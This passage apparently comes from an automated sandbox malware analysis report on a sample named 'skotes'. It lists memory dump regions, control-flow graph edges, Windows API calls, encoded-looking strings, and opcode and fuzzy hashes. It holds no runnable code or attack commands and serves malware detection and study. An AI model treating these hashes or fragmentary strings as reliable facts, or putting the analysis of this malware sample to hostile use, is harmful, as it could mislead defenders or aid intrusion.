                                                    • Associated: 0000000C.00000002.2673318430.00000000003FA000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673430177.0000000000598000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673461063.000000000059A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_e0000_skotes.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoNativeSystem
                                                    • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
                                                    • API String ID: 1721193555-3123340372
                                                    • Opcode ID: 5c35566e6efaaf0befee7e638345bafb6e91212376ce273658ad4a3d24be700b
                                                    • Instruction ID: 116d87f6586bb98e6fcc258e00f8e0ab0d80bc0ef275b23d60c13c60ad1e98c7
                                                    • Opcode Fuzzy Hash: 5c35566e6efaaf0befee7e638345bafb6e91212376ce273658ad4a3d24be700b
                                                    • Instruction Fuzzy Hash: CCE1E370E00694AFDB24BB29CD1B3AD7A71AB42724F944698E4197B3D3DB354F9087C2

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2190 11d634-11d655 call fdf80 2193 11d657 2190->2193 2194 11d66f-11d672 2190->2194 2195 11d659-11d65f 2193->2195 2196 11d68e-11d69a call 11a7c8 2193->2196 2194->2196 2197 11d674-11d677 2194->2197 2199 11d661-11d665 2195->2199 2200 11d683-11d68c call 11d57c 2195->2200 2208 11d6a4-11d6b0 call 11d5be 2196->2208 2209 11d69c-11d69f 2196->2209 2197->2200 2201 11d679-11d67c 2197->2201 2199->2196 2204 11d667-11d66b 2199->2204 2212 11d6cc-11d6d5 2200->2212 2205 11d6b2-11d6c2 call 1175f6 call 116c5a 2201->2205 2206 11d67e-11d681 2201->2206 2204->2205 2210 11d66d 2204->2210 2205->2209 2206->2200 2206->2205 2208->2205 2223 11d6c4-11d6c9 2208->2223 2213 11d80b-11d81a 2209->2213 2210->2200 2216 11d6e2-11d6f3 2212->2216 2217 11d6d7-11d6df call 118dc8 2212->2217 2221 11d6f5-11d707 2216->2221 2222 11d709 2216->2222 2217->2216 2226 11d70b-11d71c 2221->2226 2222->2226 2223->2212 2227 11d78a-11d79a call 11d7c7 2226->2227 2228 11d71e-11d720 2226->2228 2239 11d809 2227->2239 2240 11d79c-11d79e 2227->2240 2230 11d726-11d728 2228->2230 2231 11d81b-11d81d 2228->2231 2235 11d734-11d740 2230->2235 2236 11d72a-11d72d 2230->2236 2232 11d827-11d83a call 1165ed 2231->2232 2233 11d81f-11d826 call 118e10 2231->2233 2258 11d848-11d84e 2232->2258 2259 11d83c-11d846 2232->2259 2233->2232 2242 11d780-11d788 2235->2242 2243 11d742-11d757 call 11d62b * 2 2235->2243 2236->2235 2241 11d72f-11d732 2236->2241 2239->2213 2246 11d7a0-11d7b6 call 11a671 2240->2246 2247 11d7d9-11d7e2 2240->2247 2241->2235 2248 11d75a-11d75c 2241->2248 2242->2227 2243->2248 2265 11d7e5-11d7e8 2246->2265 2247->2265 2248->2242 2250 11d75e-11d76e 2248->2250 2256 11d770-11d775 2250->2256 2256->2227 2263 11d777-11d77e 2256->2263 2260 11d850-11d851 2258->2260 2261 11d867-11d878 RtlAllocateHeap 2258->2261 2259->2258 2264 11d87c-11d887 call 1175f6 2259->2264 2260->2261 2266 11d853-11d85a call 119dc0 2261->2266 2267 11d87a 2261->2267 2263->2256 2273 11d889-11d88b 2264->2273 2271 11d7f4-11d7fc 2265->2271 2272 11d7ea-11d7ed 2265->2272 2266->2264 2279 11d85c-11d865 call 118e36 2266->2279 2267->2273 2271->2239 2278 11d7fe-11d806 call 11a671 2271->2278 2272->2271 2277 11d7ef-11d7f2 2272->2277 2277->2239 2277->2271 2278->2239 2279->2261 2279->2264
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 0000000C.00000002.2672798695.00000000000E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672836765.0000000000142000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672928970.0000000000149000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.000000000014B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003B8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003F9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673318430.00000000003FA000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673430177.0000000000598000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673461063.000000000059A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_e0000_skotes.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4e93a820a08d4fec873198155095e259e06ac933caf4aec8f830f3fee067bd37
                                                    • Instruction ID: 9d4aebfa24af7c6c192dbae0823fdb0ad6faa532bb09ba01dbcca99092c59c12
                                                    • Opcode Fuzzy Hash: 4e93a820a08d4fec873198155095e259e06ac933caf4aec8f830f3fee067bd37
                                                    • Instruction Fuzzy Hash: C461E372D006148FCF2DAFA8F8856EDBBB1AB55314F258039E859672A1D7319CC0CB51

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2284 e8380-e8401 call 1140f0 2288 e840d-e8435 call f7a00 call e5c10 2284->2288 2289 e8403-e8408 2284->2289 2297 e8439-e845b call f7a00 call e5c10 2288->2297 2298 e8437 2288->2298 2290 e854f-e856b call fcff1 2289->2290 2303 e845f-e8478 2297->2303 2304 e845d 2297->2304 2298->2297 2307 e847a-e8489 2303->2307 2308 e84a9-e84d4 2303->2308 2304->2303 2309 e849f-e84a6 call fd663 2307->2309 2310 e848b-e8499 2307->2310 2311 e84d6-e84e5 2308->2311 2312 e8501-e8522 2308->2312 2309->2308 2310->2309 2315 e856c-e8571 call 116c6a 2310->2315 2317 e84f7-e84fe call fd663 2311->2317 2318 e84e7-e84f5 2311->2318 2313 e8528-e852d 2312->2313 2314 e8524-e8526 GetNativeSystemInfo 2312->2314 2319 e852e-e8535 2313->2319 2314->2319 2317->2312 2318->2315 2318->2317 2319->2290 2324 e8537-e853f 2319->2324 2327 e8548-e854b 2324->2327 2328 e8541-e8546 2324->2328 2327->2290 2329 e854d 2327->2329 2328->2290 2329->2290
                                                    APIs
                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 000E8524
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 0000000C.00000002.2672798695.00000000000E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672836765.0000000000142000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672928970.0000000000149000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.000000000014B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003B8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003F9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673318430.00000000003FA000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673430177.0000000000598000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673461063.000000000059A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_e0000_skotes.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoNativeSystem
                                                    • String ID:
                                                    • API String ID: 1721193555-0
                                                    • Opcode ID: a53671391cdf8b40304d933cc6fc5500f9e09c54d50cbb1d9f404327a132075e
                                                    • Instruction ID: 1a829a10fb824b60ae0e487342892ce2eb3232d708fbeaabb5edb3a3a5a512f2
                                                    • Opcode Fuzzy Hash: a53671391cdf8b40304d933cc6fc5500f9e09c54d50cbb1d9f404327a132075e
                                                    • Instruction Fuzzy Hash: 41516B71D046489FEB24EB28CD497EDB774DB45310F5082A8E819B72C2EF319EC08B91

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2330 11d82f-11d83a 2331 11d848-11d84e 2330->2331 2332 11d83c-11d846 2330->2332 2333 11d850-11d851 2331->2333 2334 11d867-11d878 RtlAllocateHeap 2331->2334 2332->2331 2335 11d87c-11d887 call 1175f6 2332->2335 2333->2334 2336 11d853-11d85a call 119dc0 2334->2336 2337 11d87a 2334->2337 2340 11d889-11d88b 2335->2340 2336->2335 2343 11d85c-11d865 call 118e36 2336->2343 2337->2340 2343->2334 2343->2335
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0011A72D,?,00000000,?,00116D2C,000E7883,973882A3,000E7883), ref: 0011D871
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 0000000C.00000002.2672798695.00000000000E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672836765.0000000000142000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672928970.0000000000149000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.000000000014B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003B8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003F9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673318430.00000000003FA000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673430177.0000000000598000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673461063.000000000059A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_e0000_skotes.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 2c5e9c308eeaf185ce85db5e308c513a727477b5642caaca6e718a030852e5b1
                                                    • Instruction ID: 9992936f9beee6fdea50037576c8cb9e19a1ac329cd1617a1e9d8cbef36ab064
                                                    • Opcode Fuzzy Hash: 2c5e9c308eeaf185ce85db5e308c513a727477b5642caaca6e718a030852e5b1
                                                    • Instruction Fuzzy Hash: CBF0E93160552466DF2D3A72BC01ADB7759DF96370B158131EC08A7181DB30DCD085E1

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2346 11b04b-11b057 2347 11b089-11b094 call 1175f6 2346->2347 2348 11b059-11b05b 2346->2348 2355 11b096-11b098 2347->2355 2349 11b074-11b085 RtlAllocateHeap 2348->2349 2350 11b05d-11b05e 2348->2350 2352 11b060-11b067 call 119dc0 2349->2352 2353 11b087 2349->2353 2350->2349 2352->2347 2358 11b069-11b072 call 118e36 2352->2358 2353->2355 2358->2347 2358->2349
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,973882A3,?,?,000FD3FC,973882A3,?,000F7A8B,?,?,?,?,?,?,000E7465,?), ref: 0011B07E
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 0000000C.00000002.2672798695.00000000000E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672836765.0000000000142000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672928970.0000000000149000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.000000000014B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003B8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003F9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673318430.00000000003FA000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673430177.0000000000598000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673461063.000000000059A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_e0000_skotes.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 3a3efe66ba1ad6220ebe9c38144f6d55a2fcf7f5c115037b4a6887b5019a59f1
                                                    • Instruction ID: 69c56c237bb1b627dcab91478158aa91093070992f3e54dbb36e5c1f96ff289f
                                                    • Opcode Fuzzy Hash: 3a3efe66ba1ad6220ebe9c38144f6d55a2fcf7f5c115037b4a6887b5019a59f1
                                                    • Instruction Fuzzy Hash: 65E0653564961556DA3932755C81BDBB6689B5A3A0F160230FD6896190EB60DCC081E1

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2465 4ac0ba7-4ac0ba8 2466 4ac0c1d-4ac0c45 2465->2466 2467 4ac0baa-4ac0be9 2465->2467 2472 4ac0c54-4ac0c9c 2466->2472 2477 4ac0bef-4ac0c0e call 4ac0c11 2467->2477 2476 4ac0ca7-4ac0cc8 2472->2476 2481 4ac0cd0 2476->2481 2482 4ac0ccb call 4ac0cde 2476->2482 2486 4ac0c5c-4ac0c9c 2477->2486 2487 4ac0c10-4ac0c50 2477->2487 2484 4ac0cb1-4ac0ccb call 4ac0cde 2481->2484 2485 4ac0cd2-4ac0d02 2481->2485 2482->2481 2484->2481 2492 4ac0d08-4ac0d4c call 4ac0d29 2485->2492 2486->2476 2487->2477 2491 4ac0c52 2487->2491 2491->2472
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2676124165.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_4ac0000_skotes.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: XR^a
                                                    • API String ID: 0-1581786011
                                                    • Opcode ID: a637dfe8fde140a8e03479561874e747cf0193e89b13b6ab29037efcdec8401c
                                                    • Instruction ID: 9415bbe4b2cb3a0f74d84103c78dbabcf037701d7e5568d8a13dacb0a627b708
                                                    • Opcode Fuzzy Hash: a637dfe8fde140a8e03479561874e747cf0193e89b13b6ab29037efcdec8401c
                                                    • Instruction Fuzzy Hash: C83158B620D294EEF2C296D55B156FA2B39D693330730805FF442CA202E5992A4AA271
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2676124165.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_4ac0000_skotes.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: XR^a
                                                    • API String ID: 0-1581786011
                                                    • Opcode ID: 66f2be2c947db059a6be173aca7e17b19823de91f5772604b5d9a21f05d153e4
                                                    • Instruction ID: 9352354c73d72df45fb6dbbfa5b21e247b479c630053ffe1f716a19284908527
                                                    • Opcode Fuzzy Hash: 66f2be2c947db059a6be173aca7e17b19823de91f5772604b5d9a21f05d153e4
                                                    • Instruction Fuzzy Hash: 07218BBB20D218EEF6C2E6D56B506FB677DD7D2334B30C42EF842CB141E2952A4A6130
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2676124165.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_4ac0000_skotes.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: XR^a
                                                    • API String ID: 0-1581786011
                                                    • Opcode ID: 0503948d81d17838e226cf5d83cc46aeee6c65b51048165537c66353144f741b
                                                    • Instruction ID: 1bcc72d41a1f55a51d501e05971d61d58c799a6543dedefd594145f0aa38c0f1
                                                    • Opcode Fuzzy Hash: 0503948d81d17838e226cf5d83cc46aeee6c65b51048165537c66353144f741b
                                                    • Instruction Fuzzy Hash: 69112CBB61D124EFB2C2E5D66B546FB677AD6D2330B30C42EF403C6502F2995A4A7131
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2676124165.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_4ac0000_skotes.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: XR^a
                                                    • API String ID: 0-1581786011
                                                    • Opcode ID: 3d60d211b6d4c238526034a4d6717b3a22452e444b9b7a83b6dae5cf98c99e00
                                                    • Instruction ID: 3d3bcee75ac51b6e281d2cf9c7c661714cb4ad85db69502e6451478768b084ad
                                                    • Opcode Fuzzy Hash: 3d60d211b6d4c238526034a4d6717b3a22452e444b9b7a83b6dae5cf98c99e00
                                                    • Instruction Fuzzy Hash: 0011E9BB20D164FEB6C2D5D66B146FA677DD6D2330B30C42EF442CA102E6982E4E7131
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2676124165.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_4ac0000_skotes.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: XR^a
                                                    • API String ID: 0-1581786011
                                                    • Opcode ID: 65e03237086b39f314d6518037e31609eca739ee3bc74be82139b9bdca9fab4d
                                                    • Instruction ID: b723cb190d5abc161d7469be4a9ff3801b63930fc5eea33e9d73e5d694395c6e
                                                    • Opcode Fuzzy Hash: 65e03237086b39f314d6518037e31609eca739ee3bc74be82139b9bdca9fab4d
                                                    • Instruction Fuzzy Hash: 7B1159BB20D164EEB6C2E6D66B502FB2778EBC1730B30C42EF442CA101D6542A4A7131
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2676124165.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_4ac0000_skotes.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: XR^a
                                                    • API String ID: 0-1581786011
                                                    • Opcode ID: 37f529384755a0d7e5d5860172a1b52c1bc4955bda2cdf1e81ce735a58c0dfc4
                                                    • Instruction ID: f597814ec5b4053548e88292725992cf7377e09b559f4e7665127764736a3993
                                                    • Opcode Fuzzy Hash: 37f529384755a0d7e5d5860172a1b52c1bc4955bda2cdf1e81ce735a58c0dfc4
                                                    • Instruction Fuzzy Hash: 3AF07D7621E355CFE7C3F6B175A92FEBBB1DF82720B2484AEE441CB003E104250AA221
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2676124165.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_4ac0000_skotes.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: XR^a
                                                    • API String ID: 0-1581786011
                                                    • Opcode ID: 308617c3265ce054de1017f90b20c678be75e1a1c575c9c08614f51a924c7662
                                                    • Instruction ID: 9b55d5d3cdce2fcc036af0fa069bf58dd798ce660659cac7d7e6e248e29e1259
                                                    • Opcode Fuzzy Hash: 308617c3265ce054de1017f90b20c678be75e1a1c575c9c08614f51a924c7662
                                                    • Instruction Fuzzy Hash: EAE0C2FB20C014CEB1C2A2E1BA257F7A77DE2D1730720C81FF047CA042E5143A45A032
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2676124165.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_4ac0000_skotes.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: XR^a
                                                    • API String ID: 0-1581786011
                                                    • Opcode ID: 62b93576ac298e054b73b7dee252461c4e0c3aaa9904239781c97565f63e20d1
                                                    • Instruction ID: 0ac06860110c27cdf36e13f5809fc20f9a7c224b8a40551c988e25f66e47c8f6
                                                    • Opcode Fuzzy Hash: 62b93576ac298e054b73b7dee252461c4e0c3aaa9904239781c97565f63e20d1
                                                    • Instruction Fuzzy Hash: E5D097F710C41CCE62C3A3F678243B7677AA3E8720320C629F00ACF141E8183A04A023
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2676124165.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_4ac0000_skotes.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: XR^a
                                                    • API String ID: 0-1581786011
                                                    • Opcode ID: 31e22866c59fc8ccfdcd73d800f0a2c4563857f74cb2cf0644d9d12a5755b9bf
                                                    • Instruction ID: 4305d03fd04c1ac0c4b8a3726ed58c4e12e7c50957eea9d321c6c72a65591008
                                                    • Opcode Fuzzy Hash: 31e22866c59fc8ccfdcd73d800f0a2c4563857f74cb2cf0644d9d12a5755b9bf
                                                    • Instruction Fuzzy Hash: 00D02BB611C418DDA5C797B5B9243B76339A3A03103148A26F045CB042E91439109121
                                                    APIs
                                                    • GetSystemTimePreciseAsFileTime.KERNEL32(?,000FCF52,?,?,?,?,000FCF87,?,?,?,?,?,?,000FC4FD,?,00000001), ref: 000FCC03
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 0000000C.00000002.2672798695.00000000000E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672836765.0000000000142000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672928970.0000000000149000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.000000000014B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003B8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003F9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673318430.00000000003FA000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673430177.0000000000598000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673461063.000000000059A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_e0000_skotes.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Time$FilePreciseSystem
                                                    • String ID:
                                                    • API String ID: 1802150274-0
                                                    • Opcode ID: ff37aeac4e453b943ff95144d3017a0a3e90d8ef88d95f3892cf7fa5c15956f8
                                                    • Instruction ID: a5175f7c2539a5cbebabefb32d5a5a023793878faa6bf2679fdf571a153bd7b3
                                                    • Opcode Fuzzy Hash: ff37aeac4e453b943ff95144d3017a0a3e90d8ef88d95f3892cf7fa5c15956f8
                                                    • Instruction Fuzzy Hash: 02D0223658203CD3DA163B84EC00CBDBB98CB05B183010021EE0893920CA106C80ABD0
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 0000000C.00000002.2672798695.00000000000E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672836765.0000000000142000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672928970.0000000000149000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.000000000014B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003B8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003F9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673318430.00000000003FA000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673430177.0000000000598000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673461063.000000000059A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_e0000_skotes.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b17bcc9e90793d07790edd5227874656d5b4cf5fc6a7790c5a406ed85e412de9
                                                    • Instruction ID: a7853caa10ce61ab9f9ef68e0b1eb5473c7bf77f14961b162f783b032e1f4de2
                                                    • Opcode Fuzzy Hash: b17bcc9e90793d07790edd5227874656d5b4cf5fc6a7790c5a406ed85e412de9
                                                    • Instruction Fuzzy Hash: 38E08C30451208AECF2DBB18D919ADC3B2AEF52785F104824FC1886222CB36EDC1C690
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 0000000C.00000002.2672798695.00000000000E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672836765.0000000000142000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672928970.0000000000149000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.000000000014B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003B8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003EA000.00000040.00000001.01000000.00000009.sdmpDownload File
